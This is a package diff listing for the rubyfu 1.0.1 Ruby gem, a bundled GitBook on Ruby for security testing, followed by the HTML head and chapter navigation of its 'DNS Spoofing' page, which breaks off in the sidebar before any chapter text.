rubyfu 1.0.1

Files changed (151) hide show
  1. checksums.yaml +7 -0
  2. data/README.md +96 -0
  3. data/Rakefile +1 -0
  4. data/_book/beginners.html +1299 -0
  5. data/_book/contribution.html +1350 -0
  6. data/_book/contributors/Ruby_Loves_Us.jpg +0 -0
  7. data/_book/contributors/index.html +1294 -0
  8. data/_book/contributors/todo.html +1293 -0
  9. data/_book/cover.jpg +0 -0
  10. data/_book/faqs/index.html +1308 -0
  11. data/_book/files/module03/dns_spoofing_dns-query.pcap +0 -0
  12. data/_book/files/module03/dns_spoofing_dns-req_res.pcap.pcapng +0 -0
  13. data/_book/files/module06/ftp.pcap +0 -0
  14. data/_book/files/module06/packets.pcap +0 -0
  15. data/_book/gitbook/app.js +25001 -0
  16. data/_book/gitbook/fonts/fontawesome/FontAwesome.otf +0 -0
  17. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.eot +0 -0
  18. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.svg +504 -0
  19. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.ttf +0 -0
  20. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.woff +0 -0
  21. data/_book/gitbook/images/apple-touch-icon-precomposed-152.png +0 -0
  22. data/_book/gitbook/images/favicon.ico +0 -0
  23. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/README.md +19 -0
  24. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/index.js +57 -0
  25. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/package.json +47 -0
  26. data/_book/gitbook/plugins/gitbook-plugin-anchors/plugin.css +26 -0
  27. data/_book/gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js +30 -0
  28. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css +28 -0
  29. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js +68 -0
  30. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/buttons.js +151 -0
  31. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/website.css +291 -0
  32. data/_book/gitbook/plugins/gitbook-plugin-highlight/ebook.css +131 -0
  33. data/_book/gitbook/plugins/gitbook-plugin-highlight/website.css +426 -0
  34. data/_book/gitbook/plugins/gitbook-plugin-search/lunr.min.js +7 -0
  35. data/_book/gitbook/plugins/gitbook-plugin-search/search.css +27 -0
  36. data/_book/gitbook/plugins/gitbook-plugin-search/search.js +135 -0
  37. data/_book/gitbook/plugins/gitbook-plugin-sharing/buttons.js +93 -0
  38. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.css +22 -0
  39. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.js +122 -0
  40. data/_book/gitbook/style.css +9 -0
  41. data/_book/googlec55db2d603c3da8b.html +1 -0
  42. data/_book/images/module02/Cryptography__wiringdiagram.png +0 -0
  43. data/_book/images/module02/packaging__ocra1.png +0 -0
  44. data/_book/images/module03/dns_spoofing_wireshark1.png +0 -0
  45. data/_book/images/module03/dns_spoofing_wireshark2.png +0 -0
  46. data/_book/images/module04/webfu__post_form1.png +0 -0
  47. data/_book/images/module04/webfu__proxy2.png +0 -0
  48. data/_book/images/module04/webfu__twitterAPI1.png +0 -0
  49. data/_book/images/module04/webfu__xmlrpc1.png +0 -0
  50. data/_book/images/module05/msf_template1.png +0 -0
  51. data/_book/images/module06/win-foren__winreg1.png +0 -0
  52. data/_book/images/other/Ruby_Loves_Us.jpg +0 -0
  53. data/_book/images/other/cover.jpg +0 -0
  54. data/_book/images/other/cover_small.jpg +0 -0
  55. data/_book/images/other/logo.png +0 -0
  56. data/_book/images/other/rubyfu.png +0 -0
  57. data/_book/images/other/rubyfu1.png +0 -0
  58. data/_book/images/other/rubyfu3.png +0 -0
  59. data/_book/images/other/rubyfu4.png +0 -0
  60. data/_book/images/other/rubyfu_.png +0 -0
  61. data/_book/index.html +1284 -0
  62. data/_book/module_0x1__basic_ruby_kung_fu/array.html +1297 -0
  63. data/_book/module_0x1__basic_ruby_kung_fu/conversion.html +1386 -0
  64. data/_book/module_0x1__basic_ruby_kung_fu/extraction.html +1346 -0
  65. data/_book/module_0x1__basic_ruby_kung_fu/index.html +1367 -0
  66. data/_book/module_0x1__basic_ruby_kung_fu/string.html +1451 -0
  67. data/_book/module_0x2__system_kung_fu/command_execution.html +1348 -0
  68. data/_book/module_0x2__system_kung_fu/cryptography.html +1396 -0
  69. data/_book/module_0x2__system_kung_fu/email.html +1352 -0
  70. data/_book/module_0x2__system_kung_fu/file_manipulation.html +1371 -0
  71. data/_book/module_0x2__system_kung_fu/index.html +1557 -0
  72. data/_book/module_0x2__system_kung_fu/ncatrb.html +1424 -0
  73. data/_book/module_0x2__system_kung_fu/packaging.md +1 -0
  74. data/_book/module_0x2__system_kung_fu/packaging__ocra1.png +0 -0
  75. data/_book/module_0x2__system_kung_fu/parsing_html,_xml,_json.html +1395 -0
  76. data/_book/module_0x2__system_kung_fu/rce_as_a_service.html +1336 -0
  77. data/_book/module_0x2__system_kung_fu/smtp_enumeration.html +1308 -0
  78. data/_book/module_0x2__system_kung_fu/system_shell.html +1299 -0
  79. data/_book/module_0x2__system_kung_fu/virustotal.html +1318 -0
  80. data/_book/module_0x3__network_kung_fu/Remote_shell.md +19 -0
  81. data/_book/module_0x3__network_kung_fu/arp_spoofing.html +1420 -0
  82. data/_book/module_0x3__network_kung_fu/dns.html +1315 -0
  83. data/_book/module_0x3__network_kung_fu/dns_bruteforce.md +49 -0
  84. data/_book/module_0x3__network_kung_fu/dns_enumeration.html +1371 -0
  85. data/_book/module_0x3__network_kung_fu/dns_spoofing.html +1694 -0
  86. data/_book/module_0x3__network_kung_fu/dns_spoofing_wireshark2.png +0 -0
  87. data/_book/module_0x3__network_kung_fu/ftp.html +1287 -0
  88. data/_book/module_0x3__network_kung_fu/index.html +1392 -0
  89. data/_book/module_0x3__network_kung_fu/network_scanning.html +1339 -0
  90. data/_book/module_0x3__network_kung_fu/network_traffic_analysis.html +1356 -0
  91. data/_book/module_0x3__network_kung_fu/nmap.html +1355 -0
  92. data/_book/module_0x3__network_kung_fu/oracle_tns_enum1.png +0 -0
  93. data/_book/module_0x3__network_kung_fu/packet_manipulation.html +1386 -0
  94. data/_book/module_0x3__network_kung_fu/ruby_socket.html +1553 -0
  95. data/_book/module_0x3__network_kung_fu/snmp_enumeration.html +1314 -0
  96. data/_book/module_0x3__network_kung_fu/ssh.html +1461 -0
  97. data/_book/module_0x3__network_kung_fu/ssid_finder.html +1324 -0
  98. data/_book/module_0x3__network_kung_fu/tns_enumeration.html +1505 -0
  99. data/_book/module_0x4__web_kung_fu/browser_manipulation.html +1630 -0
  100. data/_book/module_0x4__web_kung_fu/databases.html +1531 -0
  101. data/_book/module_0x4__web_kung_fu/extending_burpsuite.html +1303 -0
  102. data/_book/module_0x4__web_kung_fu/index.html +1536 -0
  103. data/_book/module_0x4__web_kung_fu/interacting_with_apis.html +1271 -0
  104. data/_book/module_0x4__web_kung_fu/ruby2javascript.html +1303 -0
  105. data/_book/module_0x4__web_kung_fu/sql_injection_scanner.html +1489 -0
  106. data/_book/module_0x4__web_kung_fu/twitter_api.html +1328 -0
  107. data/_book/module_0x4__web_kung_fu/web_servcies_and_apis.html +1291 -0
  108. data/_book/module_0x4__web_kung_fu/web_server_and_proxy.html +1370 -0
  109. data/_book/module_0x4__web_kung_fu/web_services.html +1394 -0
  110. data/_book/module_0x4__web_kung_fu/webfu__burp-ext1.png +0 -0
  111. data/_book/module_0x4__web_kung_fu/webfu__burp-ext2.png +0 -0
  112. data/_book/module_0x4__web_kung_fu/webfu__burp_setenv1.png +0 -0
  113. data/_book/module_0x4__web_kung_fu/webfu__proxy2.png +0 -0
  114. data/_book/module_0x4__web_kung_fu/webfu__twitterAPI1.png +0 -0
  115. data/_book/module_0x4__web_kung_fu/webfu__xmlrpc1.png +0 -0
  116. data/_book/module_0x4__web_kung_fu/wordpress_api.html +1543 -0
  117. data/_book/module_0x5__exploitation_kung_fu/MSF-struct.png +0 -0
  118. data/_book/module_0x5__exploitation_kung_fu/auxiliary_module.html +1870 -0
  119. data/_book/module_0x5__exploitation_kung_fu/exploit_module.html +1523 -0
  120. data/_book/module_0x5__exploitation_kung_fu/extensions.html +1466 -0
  121. data/_book/module_0x5__exploitation_kung_fu/fuzzer.html +1325 -0
  122. data/_book/module_0x5__exploitation_kung_fu/index.html +1319 -0
  123. data/_book/module_0x5__exploitation_kung_fu/metasm.html +1322 -0
  124. data/_book/module_0x5__exploitation_kung_fu/metasploit.html +1441 -0
  125. data/_book/module_0x5__exploitation_kung_fu/meterpreter.html +1327 -0
  126. data/_book/module_0x5__exploitation_kung_fu/meterpreter_scripting.html +1318 -0
  127. data/_book/module_0x5__exploitation_kung_fu/msf_meter_railgun1.png +0 -0
  128. data/_book/module_0x5__exploitation_kung_fu/msf_template1.png +0 -0
  129. data/_book/module_0x5__exploitation_kung_fu/railgun_api_extension.html +1300 -0
  130. data/_book/module_0x6__forensic/android_forensic.html +1356 -0
  131. data/_book/module_0x6__forensic/index.html +1332 -0
  132. data/_book/module_0x6__forensic/parsing_log_files.html +1375 -0
  133. data/_book/module_0x6__forensic/win-foren__winreg1.png +0 -0
  134. data/_book/module_0x6__forensic/windows_forensic.html +1289 -0
  135. data/_book/package.json +5 -0
  136. data/_book/references/index.html +1338 -0
  137. data/_book/required_gems.html +1342 -0
  138. data/_book/rubyfu_.png +0 -0
  139. data/_book/search_index.json +1 -0
  140. data/_book/styles/ebook.css +1 -0
  141. data/_book/styles/epub.css +1 -0
  142. data/_book/styles/header.js +5 -0
  143. data/_book/styles/mobi.css +1 -0
  144. data/_book/styles/pdf.css +1 -0
  145. data/_book/styles/website.css +41 -0
  146. data/bin/rubyfu +48 -0
  147. data/lib/rubyfu.rb +36 -0
  148. data/lib/rubyfu/browse.rb +35 -0
  149. data/lib/rubyfu/version.rb +3 -0
  150. data/lib/rubyfu/webserver.rb +30 -0
  151. metadata +210 -0
@@ -0,0 +1,1694 @@
1
+ <!DOCTYPE HTML>
2
+ <html lang="en" >
3
+
4
+ <head>
5
+
6
+ <meta charset="UTF-8">
7
+ <meta http-equiv="X-UA-Compatible" content="IE=edge" />
8
+ <title>DNS Spoofing | RubyFu</title>
9
+ <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
10
+ <meta name="description" content="">
11
+ <meta name="generator" content="GitBook 2.6.2">
12
+
13
+
14
+ <meta name="HandheldFriendly" content="true"/>
15
+ <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
16
+ <meta name="apple-mobile-web-app-capable" content="yes">
17
+ <meta name="apple-mobile-web-app-status-bar-style" content="black">
18
+ <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../gitbook/images/apple-touch-icon-precomposed-152.png">
19
+ <link rel="shortcut icon" href="../gitbook/images/favicon.ico" type="image/x-icon">
20
+
21
+ <link rel="stylesheet" href="../gitbook/style.css">
22
+
23
+
24
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-anchors/plugin.css">
25
+
26
+
27
+
28
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-splitter/splitter.css">
29
+
30
+
31
+
32
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css">
33
+
34
+
35
+
36
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-highlight/website.css">
37
+
38
+
39
+
40
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-search/search.css">
41
+
42
+
43
+
44
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-fontsettings/website.css">
45
+
46
+
47
+
48
+ <link rel="stylesheet" href="../styles/website.css">
49
+
50
+
51
+
52
+
53
+
54
+ <link rel="next" href="../module_0x4__web_kung_fu/index.html" />
55
+
56
+
57
+ <link rel="prev" href="../module_0x3__network_kung_fu/arp_spoofing.html" />
58
+
59
+
60
+ <script type="text/javascript" src="../styles/header.js"></script>
61
+ </head>
62
+ <body>
63
+
64
+
65
+ <div class="book"
66
+ data-level="3.10.2"
67
+ data-chapter-title="DNS Spoofing"
68
+ data-filepath="module_0x3__network_kung_fu/dns_spoofing.md"
69
+ data-basepath=".."
70
+ data-revision="Wed Jan 27 2016 09:00:51 GMT+0300 (AST)"
71
+ data-innerlanguage="">
72
+
73
+
74
+ <div class="book-summary">
75
+ <nav role="navigation">
76
+ <ul class="summary">
77
+
78
+
79
+
80
+
81
+
82
+
83
+
84
+
85
+
86
+ <li class="chapter " data-level="0" data-path="index.html">
87
+
88
+
89
+ <a href="../index.html">
90
+
91
+ <i class="fa fa-check"></i>
92
+
93
+ Module 0x0 | Introduction
94
+ </a>
95
+
96
+
97
+ <ul class="articles">
98
+
99
+
100
+ <li class="chapter " data-level="0.1" data-path="contribution.html">
101
+
102
+
103
+ <a href="../contribution.html">
104
+
105
+ <i class="fa fa-check"></i>
106
+
107
+ <b>0.1.</b>
108
+
109
+ Contribution
110
+ </a>
111
+
112
+
113
+ </li>
114
+
115
+ <li class="chapter " data-level="0.2" data-path="beginners.html">
116
+
117
+
118
+ <a href="../beginners.html">
119
+
120
+ <i class="fa fa-check"></i>
121
+
122
+ <b>0.2.</b>
123
+
124
+ Beginners
125
+ </a>
126
+
127
+
128
+ </li>
129
+
130
+ <li class="chapter " data-level="0.3" data-path="required_gems.html">
131
+
132
+
133
+ <a href="../required_gems.html">
134
+
135
+ <i class="fa fa-check"></i>
136
+
137
+ <b>0.3.</b>
138
+
139
+ Required Gems
140
+ </a>
141
+
142
+
143
+ </li>
144
+
145
+
146
+ </ul>
147
+
148
+ </li>
149
+
150
+ <li class="chapter " data-level="1" data-path="module_0x1__basic_ruby_kung_fu/index.html">
151
+
152
+
153
+ <a href="../module_0x1__basic_ruby_kung_fu/index.html">
154
+
155
+ <i class="fa fa-check"></i>
156
+
157
+ <b>1.</b>
158
+
159
+ Module 0x1 | Basic Ruby Kung Fu
160
+ </a>
161
+
162
+
163
+ <ul class="articles">
164
+
165
+
166
+ <li class="chapter " data-level="1.1" data-path="module_0x1__basic_ruby_kung_fu/string.html">
167
+
168
+
169
+ <a href="../module_0x1__basic_ruby_kung_fu/string.html">
170
+
171
+ <i class="fa fa-check"></i>
172
+
173
+ <b>1.1.</b>
174
+
175
+ String
176
+ </a>
177
+
178
+
179
+ <ul class="articles">
180
+
181
+
182
+ <li class="chapter " data-level="1.1.1" data-path="module_0x1__basic_ruby_kung_fu/conversion.html">
183
+
184
+
185
+ <a href="../module_0x1__basic_ruby_kung_fu/conversion.html">
186
+
187
+ <i class="fa fa-check"></i>
188
+
189
+ <b>1.1.1.</b>
190
+
191
+ Conversion
192
+ </a>
193
+
194
+
195
+ </li>
196
+
197
+ <li class="chapter " data-level="1.1.2" data-path="module_0x1__basic_ruby_kung_fu/extraction.html">
198
+
199
+
200
+ <a href="../module_0x1__basic_ruby_kung_fu/extraction.html">
201
+
202
+ <i class="fa fa-check"></i>
203
+
204
+ <b>1.1.2.</b>
205
+
206
+ Extraction
207
+ </a>
208
+
209
+
210
+ </li>
211
+
212
+
213
+ </ul>
214
+
215
+ </li>
216
+
217
+ <li class="chapter " data-level="1.2" data-path="module_0x1__basic_ruby_kung_fu/array.html">
218
+
219
+
220
+ <a href="../module_0x1__basic_ruby_kung_fu/array.html">
221
+
222
+ <i class="fa fa-check"></i>
223
+
224
+ <b>1.2.</b>
225
+
226
+ Array
227
+ </a>
228
+
229
+
230
+ </li>
231
+
232
+
233
+ </ul>
234
+
235
+ </li>
236
+
237
+ <li class="chapter " data-level="2" data-path="module_0x2__system_kung_fu/index.html">
238
+
239
+
240
+ <a href="../module_0x2__system_kung_fu/index.html">
241
+
242
+ <i class="fa fa-check"></i>
243
+
244
+ <b>2.</b>
245
+
246
+ Module 0x2 | System Kung Fu
247
+ </a>
248
+
249
+
250
+ <ul class="articles">
251
+
252
+
253
+ <li class="chapter " data-level="2.1" data-path="module_0x2__system_kung_fu/command_execution.html">
254
+
255
+
256
+ <a href="../module_0x2__system_kung_fu/command_execution.html">
257
+
258
+ <i class="fa fa-check"></i>
259
+
260
+ <b>2.1.</b>
261
+
262
+ Command Execution
263
+ </a>
264
+
265
+
266
+ </li>
267
+
268
+ <li class="chapter " data-level="2.2" data-path="module_0x2__system_kung_fu/file_manipulation.html">
269
+
270
+
271
+ <a href="../module_0x2__system_kung_fu/file_manipulation.html">
272
+
273
+ <i class="fa fa-check"></i>
274
+
275
+ <b>2.2.</b>
276
+
277
+ File manipulation
278
+ </a>
279
+
280
+
281
+ <ul class="articles">
282
+
283
+
284
+ <li class="chapter " data-level="2.2.1" data-path="module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
285
+
286
+
287
+ <a href="../module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
288
+
289
+ <i class="fa fa-check"></i>
290
+
291
+ <b>2.2.1.</b>
292
+
293
+ Parsing HTML, XML, JSON
294
+ </a>
295
+
296
+
297
+ </li>
298
+
299
+
300
+ </ul>
301
+
302
+ </li>
303
+
304
+ <li class="chapter " data-level="2.3" data-path="module_0x2__system_kung_fu/cryptography.html">
305
+
306
+
307
+ <a href="../module_0x2__system_kung_fu/cryptography.html">
308
+
309
+ <i class="fa fa-check"></i>
310
+
311
+ <b>2.3.</b>
312
+
313
+ Cryptography
314
+ </a>
315
+
316
+
317
+ </li>
318
+
319
+ <li class="chapter " data-level="2.4" data-path="module_0x2__system_kung_fu/system_shell.html">
320
+
321
+
322
+ <a href="../module_0x2__system_kung_fu/system_shell.html">
323
+
324
+ <i class="fa fa-check"></i>
325
+
326
+ <b>2.4.</b>
327
+
328
+ Remote Shell
329
+ </a>
330
+
331
+
332
+ <ul class="articles">
333
+
334
+
335
+ <li class="chapter " data-level="2.4.1" data-path="module_0x2__system_kung_fu/ncatrb.html">
336
+
337
+
338
+ <a href="../module_0x2__system_kung_fu/ncatrb.html">
339
+
340
+ <i class="fa fa-check"></i>
341
+
342
+ <b>2.4.1.</b>
343
+
344
+ Ncat.rb
345
+ </a>
346
+
347
+
348
+ </li>
349
+
350
+ <li class="chapter " data-level="2.4.2" data-path="module_0x2__system_kung_fu/rce_as_a_service.html">
351
+
352
+
353
+ <a href="../module_0x2__system_kung_fu/rce_as_a_service.html">
354
+
355
+ <i class="fa fa-check"></i>
356
+
357
+ <b>2.4.2.</b>
358
+
359
+ RCE as a Service
360
+ </a>
361
+
362
+
363
+ </li>
364
+
365
+
366
+ </ul>
367
+
368
+ </li>
369
+
370
+ <li class="chapter " data-level="2.5" data-path="module_0x2__system_kung_fu/virustotal.html">
371
+
372
+
373
+ <a href="../module_0x2__system_kung_fu/virustotal.html">
374
+
375
+ <i class="fa fa-check"></i>
376
+
377
+ <b>2.5.</b>
378
+
379
+ VirusTotal
380
+ </a>
381
+
382
+
383
+ </li>
384
+
385
+
386
+ </ul>
387
+
388
+ </li>
389
+
390
+ <li class="chapter " data-level="3" data-path="module_0x3__network_kung_fu/index.html">
391
+
392
+
393
+ <a href="../module_0x3__network_kung_fu/index.html">
394
+
395
+ <i class="fa fa-check"></i>
396
+
397
+ <b>3.</b>
398
+
399
+ Module 0x3 | Network Kung Fu
400
+ </a>
401
+
402
+
403
+ <ul class="articles">
404
+
405
+
406
+ <li class="chapter " data-level="3.1" data-path="module_0x3__network_kung_fu/ruby_socket.html">
407
+
408
+
409
+ <a href="../module_0x3__network_kung_fu/ruby_socket.html">
410
+
411
+ <i class="fa fa-check"></i>
412
+
413
+ <b>3.1.</b>
414
+
415
+ Ruby Socket
416
+ </a>
417
+
418
+
419
+ </li>
420
+
421
+ <li class="chapter " data-level="3.2" data-path="module_0x3__network_kung_fu/ssid_finder.html">
422
+
423
+
424
+ <a href="../module_0x3__network_kung_fu/ssid_finder.html">
425
+
426
+ <i class="fa fa-check"></i>
427
+
428
+ <b>3.2.</b>
429
+
430
+ SSID Finder
431
+ </a>
432
+
433
+
434
+ </li>
435
+
436
+ <li class="chapter " data-level="3.3" data-path="module_0x3__network_kung_fu/ftp.html">
437
+
438
+
439
+ <a href="../module_0x3__network_kung_fu/ftp.html">
440
+
441
+ <i class="fa fa-check"></i>
442
+
443
+ <b>3.3.</b>
444
+
445
+ FTP
446
+ </a>
447
+
448
+
449
+ </li>
450
+
451
+ <li class="chapter " data-level="3.4" data-path="module_0x3__network_kung_fu/ssh.html">
452
+
453
+
454
+ <a href="../module_0x3__network_kung_fu/ssh.html">
455
+
456
+ <i class="fa fa-check"></i>
457
+
458
+ <b>3.4.</b>
459
+
460
+ SSH
461
+ </a>
462
+
463
+
464
+ </li>
465
+
466
+ <li class="chapter " data-level="3.5" data-path="module_0x2__system_kung_fu/email.html">
467
+
468
+
469
+ <a href="../module_0x2__system_kung_fu/email.html">
470
+
471
+ <i class="fa fa-check"></i>
472
+
473
+ <b>3.5.</b>
474
+
475
+ Email
476
+ </a>
477
+
478
+
479
+ <ul class="articles">
480
+
481
+
482
+ <li class="chapter " data-level="3.5.1" data-path="module_0x2__system_kung_fu/smtp_enumeration.html">
483
+
484
+
485
+ <a href="../module_0x2__system_kung_fu/smtp_enumeration.html">
486
+
487
+ <i class="fa fa-check"></i>
488
+
489
+ <b>3.5.1.</b>
490
+
491
+ SMTP Enumeration
492
+ </a>
493
+
494
+
495
+ </li>
496
+
497
+
498
+ </ul>
499
+
500
+ </li>
501
+
502
+ <li class="chapter " data-level="3.6" data-path="module_0x3__network_kung_fu/network_scanning.html">
503
+
504
+
505
+ <a href="../module_0x3__network_kung_fu/network_scanning.html">
506
+
507
+ <i class="fa fa-check"></i>
508
+
509
+ <b>3.6.</b>
510
+
511
+ Network Scanning
512
+ </a>
513
+
514
+
515
+ <ul class="articles">
516
+
517
+
518
+ <li class="chapter " data-level="3.6.1" data-path="module_0x3__network_kung_fu/nmap.html">
519
+
520
+
521
+ <a href="../module_0x3__network_kung_fu/nmap.html">
522
+
523
+ <i class="fa fa-check"></i>
524
+
525
+ <b>3.6.1.</b>
526
+
527
+ Nmap
528
+ </a>
529
+
530
+
531
+ </li>
532
+
533
+
534
+ </ul>
535
+
536
+ </li>
537
+
538
+ <li class="chapter " data-level="3.7" data-path="module_0x3__network_kung_fu/dns.html">
539
+
540
+
541
+ <a href="../module_0x3__network_kung_fu/dns.html">
542
+
543
+ <i class="fa fa-check"></i>
544
+
545
+ <b>3.7.</b>
546
+
547
+ DNS
548
+ </a>
549
+
550
+
551
+ <ul class="articles">
552
+
553
+
554
+ <li class="chapter " data-level="3.7.1" data-path="module_0x3__network_kung_fu/dns_enumeration.html">
555
+
556
+
557
+ <a href="../module_0x3__network_kung_fu/dns_enumeration.html">
558
+
559
+ <i class="fa fa-check"></i>
560
+
561
+ <b>3.7.1.</b>
562
+
563
+ DNS Enumeration
564
+ </a>
565
+
566
+
567
+ </li>
568
+
569
+
570
+ </ul>
571
+
572
+ </li>
573
+
574
+ <li class="chapter " data-level="3.8" data-path="module_0x3__network_kung_fu/snmp_enumeration.html">
575
+
576
+
577
+ <a href="../module_0x3__network_kung_fu/snmp_enumeration.html">
578
+
579
+ <i class="fa fa-check"></i>
580
+
581
+ <b>3.8.</b>
582
+
583
+ SNMP Enumeration
584
+ </a>
585
+
586
+
587
+ </li>
588
+
589
+ <li class="chapter " data-level="3.9" data-path="module_0x3__network_kung_fu/tns_enumeration.html">
590
+
591
+
592
+ <a href="../module_0x3__network_kung_fu/tns_enumeration.html">
593
+
594
+ <i class="fa fa-check"></i>
595
+
596
+ <b>3.9.</b>
597
+
598
+ Oracle TNS Enumeration
599
+ </a>
600
+
601
+
602
+ </li>
603
+
604
+ <li class="chapter " data-level="3.10" data-path="module_0x3__network_kung_fu/packet_manipulation.html">
605
+
606
+
607
+ <a href="../module_0x3__network_kung_fu/packet_manipulation.html">
608
+
609
+ <i class="fa fa-check"></i>
610
+
611
+ <b>3.10.</b>
612
+
613
+ Packet manipulation
614
+ </a>
615
+
616
+
617
+ <ul class="articles">
618
+
619
+
620
+ <li class="chapter " data-level="3.10.1" data-path="module_0x3__network_kung_fu/arp_spoofing.html">
621
+
622
+
623
+ <a href="../module_0x3__network_kung_fu/arp_spoofing.html">
624
+
625
+ <i class="fa fa-check"></i>
626
+
627
+ <b>3.10.1.</b>
628
+
629
+ ARP Spoofing
630
+ </a>
631
+
632
+
633
+ </li>
634
+
635
+ <li class="chapter active" data-level="3.10.2" data-path="module_0x3__network_kung_fu/dns_spoofing.html">
636
+
637
+
638
+ <a href="../module_0x3__network_kung_fu/dns_spoofing.html">
639
+
640
+ <i class="fa fa-check"></i>
641
+
642
+ <b>3.10.2.</b>
643
+
644
+ DNS Spoofing
645
+ </a>
646
+
647
+
648
+ </li>
649
+
650
+
651
+ </ul>
652
+
653
+ </li>
654
+
655
+
656
+ </ul>
657
+
658
+ </li>
659
+
660
+ <li class="chapter " data-level="4" data-path="module_0x4__web_kung_fu/index.html">
661
+
662
+
663
+ <a href="../module_0x4__web_kung_fu/index.html">
664
+
665
+ <i class="fa fa-check"></i>
666
+
667
+ <b>4.</b>
668
+
669
+ Module 0x4 | Web Kung Fu
670
+ </a>
671
+
672
+
673
+ <ul class="articles">
674
+
675
+
676
+ <li class="chapter " data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
677
+
678
+
679
+ <a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
680
+
681
+ <i class="fa fa-check"></i>
682
+
683
+ <b>4.1.</b>
684
+
685
+ SQL Injection Scanner
686
+ </a>
687
+
688
+
689
+ </li>
690
+
691
+ <li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
692
+
693
+
694
+ <a href="../module_0x4__web_kung_fu/databases.html">
695
+
696
+ <i class="fa fa-check"></i>
697
+
698
+ <b>4.2.</b>
699
+
700
+ Databases
701
+ </a>
702
+
703
+
704
+ </li>
705
+
706
+ <li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
707
+
708
+
709
+ <a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
710
+
711
+ <i class="fa fa-check"></i>
712
+
713
+ <b>4.3.</b>
714
+
715
+ Extending Burp Suite
716
+ </a>
717
+
718
+
719
+ </li>
720
+
721
+ <li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
722
+
723
+
724
+ <a href="../module_0x4__web_kung_fu/browser_manipulation.html">
725
+
726
+ <i class="fa fa-check"></i>
727
+
728
+ <b>4.4.</b>
729
+
730
+ Browser Manipulation
731
+ </a>
732
+
733
+
734
+ </li>
735
+
736
+ <li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
737
+
738
+
739
+ <a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
740
+
741
+ <i class="fa fa-check"></i>
742
+
743
+ <b>4.5.</b>
744
+
745
+ Web Services and APIs
746
+ </a>
747
+
748
+
749
+ <ul class="articles">
750
+
751
+
752
+ <li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
753
+
754
+
755
+ <a href="../module_0x4__web_kung_fu/web_services.html">
756
+
757
+ <i class="fa fa-check"></i>
758
+
759
+ <b>4.5.1.</b>
760
+
761
+ Interacting with Web Services
762
+ </a>
763
+
764
+
765
+ </li>
766
+
767
+ <li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
768
+
769
+
770
+ <a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
771
+
772
+ <i class="fa fa-check"></i>
773
+
774
+ <b>4.5.2.</b>
775
+
776
+ Interacting with APIs
777
+ </a>
778
+
779
+
780
+ <ul class="articles">
781
+
782
+
783
+ <li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
784
+
785
+
786
+ <a href="../module_0x4__web_kung_fu/wordpress_api.html">
787
+
788
+ <i class="fa fa-check"></i>
789
+
790
+ <b>4.5.2.1.</b>
791
+
792
+ WordPress API
793
+ </a>
794
+
795
+
796
+ </li>
797
+
798
+ <li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
799
+
800
+
801
+ <a href="../module_0x4__web_kung_fu/twitter_api.html">
802
+
803
+ <i class="fa fa-check"></i>
804
+
805
+ <b>4.5.2.2.</b>
806
+
807
+ Twitter API
808
+ </a>
809
+
810
+
811
+ </li>
812
+
813
+
814
+ </ul>
815
+
816
+ </li>
817
+
818
+
819
+ </ul>
820
+
821
+ </li>
822
+
823
+ <li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
824
+
825
+
826
+ <a href="../module_0x4__web_kung_fu/ruby2javascript.html">
827
+
828
+ <i class="fa fa-check"></i>
829
+
830
+ <b>4.6.</b>
831
+
832
+ Ruby 2 JavaScript
833
+ </a>
834
+
835
+
836
+ </li>
837
+
838
+ <li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
839
+
840
+
841
+ <a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
842
+
843
+ <i class="fa fa-check"></i>
844
+
845
+ <b>4.7.</b>
846
+
847
+ Web Server and Proxy
848
+ </a>
849
+
850
+
851
+ </li>
852
+
853
+
854
+ </ul>
855
+
856
+ </li>
857
+
858
+ <li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
859
+
860
+
861
+ <a href="../module_0x5__exploitation_kung_fu/index.html">
862
+
863
+ <i class="fa fa-check"></i>
864
+
865
+ <b>5.</b>
866
+
867
+ Module 0x5 | Exploitation Kung Fu
868
+ </a>
869
+
870
+
871
+ <ul class="articles">
872
+
873
+
874
